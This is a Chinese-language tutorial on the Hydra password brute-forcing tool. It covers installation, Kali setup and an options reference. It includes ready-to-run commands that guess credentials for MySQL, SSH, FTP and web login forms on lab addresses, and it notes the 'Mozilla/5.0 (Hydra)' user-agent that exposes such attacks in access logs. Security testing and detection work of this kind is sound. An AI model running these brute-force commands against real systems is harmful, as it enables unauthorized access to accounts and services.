最大的安全漏洞之一是密码,hydra展示从远程访问到系统的未经授权访问是多么的容易。
支撑平台
所有UNIX平台(Linux、*BSD、Solaris等)
MacOS(基本上是BSD克隆)
带有Cygwin的Windows(IPv 4和IPv 6)
基于Linux、MacOS或QNX的移动系统(如Android、iPhone、黑莓10、Zaurus、iPaq)
hydra 在Linux、Windows/Cygwin、Solaris、FreeBSD/OpenBSD、QNX(黑莓10)和MacOS上进行了干净的编译。
支持协议
目前,该工具支持以下协议:Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID,
Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP编译安装hydra
下载地址 https://github.com/vanhauser-thc/thc-hydra
hydra官方网站 https://www.thc.org
./configure
make
make install
或者你也可以安装kali系统,它自带了hydra工具,我使用了这种方法
# kali linux安装
1.下载VMware版本,因为我使用的是vmware所以下载了vmware64位的
Kali Linux VMware 64-Bit (7z) https://images.kali.org/virtual-images/kali-linux-2021.1-vmware-amd64.7z
Kali Linux VMware 32-Bit (7z) https://images.kali.org/virtual-images/kali-linux-2021.1-vmware-i386.7z
Kali Linux VirtualBox 64-Bit (OVA) https://images.kali.org/virtual-images/kali-linux-2021.1-vbox-amd64.ova
Kali Linux VirtualBox 32-Bit (OVA) https://images.kali.org/virtual-images/kali-linux-2021.1-vbox-i386.ova
2.vmware [文件]-[打开],进入解压缩后的文件夹选择,开箱即用
hydra web端常见使用
# mysql hydra -l PrivateCloudUser -P /anquan/hydra/mysqlpassword.txt -e n -t 5 -vV 192.168.1.237 mysql # ssh hydra -l root -P /anquan/hydra/sshpassword.txt -e n -t 5 -vV 192.168.1.237 ssh hydra -l root -p iampassword -e n -t 5 -vV 192.168.1.237 ssh hydra -L /anquan/hydra/logins.txt -P /anquan/hydra/sshpassword.txt -M /anquan/hydra/targets.txt ssh -vV -o /anquan/hydra/r/ssh.txt # ftp hydra -l admin -p password ftp://localhost/ hydra -L default_logins.txt -p test ftp://localhost/ hydra -l admin -P common_passwords.txt ftp://localhost/ hydra -L logins.txt -P passwords.txt ftp://localhost/ # web hydra -L /anquan/hydra/weblogins.txt -P /anquan/hydra/webpassword.txt -o /anquan/hydra/http_post.txt -t 1 -f 127.0.0.1 http-post-form login.php:name=^USER^&pwd=^PASS^:<title>login fail</title>”
hydra爆破登录时,有个能暴露是爆破登录的弱点,就是被攻击的web的access日志会有"Mozilla/5.0 (Hydra)"字样的请求,如:
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "GET /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)" 11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)" 11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "GET /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)" 11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)" 11.20.13.9 - - [15/Apr/2021:19:54:30 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
hydra参数说明
Options: -R restore a previous aborted/crashed session -I ignore an existing restore file (don't wait 10 seconds) -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help -y disable use of symbols in bruteforce, see above -r rainy mode for password generation (-x) -e nsr try "n" null password, "s" login as pass and/or "r" reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -o FILE write found login/password pairs to FILE instead of stdout -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel per target (default: 16) -T TASKS run TASKS connects in parallel overall (for -M, default: 64) -w / -W TIME wait time for a response (32) / between connects per thread (0) -c TIME wait time per login attempt over all threads (enforces -t 1) -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M) -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -O use old SSL v2 and v3 -K do not redo failed attempts (good for -M mass scanning) -q do not print messages about connection errors -U service module usage details -m OPT options specific for a module, see -U output for information -h more command line options (COMPLETE HELP) server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help)
Options: -R 修复之前使用的aborted/crashed session -S 执行SSL(Secure Socket Layer)连接 -s Port 使用非默认服务器端口而是其他端口时,指定其端口 -l Login 已经获取登录ID的情况下输入登录ID -L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径) -p Pass 已经获取登录密码的情况下输入登录密码 -P FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径) -x MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解 -C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式 -M FILE指定实施并列攻击的文件服务器的目录文件 -o FILE以STDOUT的形式输出结果值 -f 查找到第一个可以使用的ID和密码的时候停止破解 -t TASKS 指定并列连接数(默认值:16) -w 指定每个线程的回应时间(Waittime)(默认值:32秒) -4/6 指定IPv4/IPv6(默认值:IPv4) -v/-V 显示详细信息 -U 查看服务器组件使用详情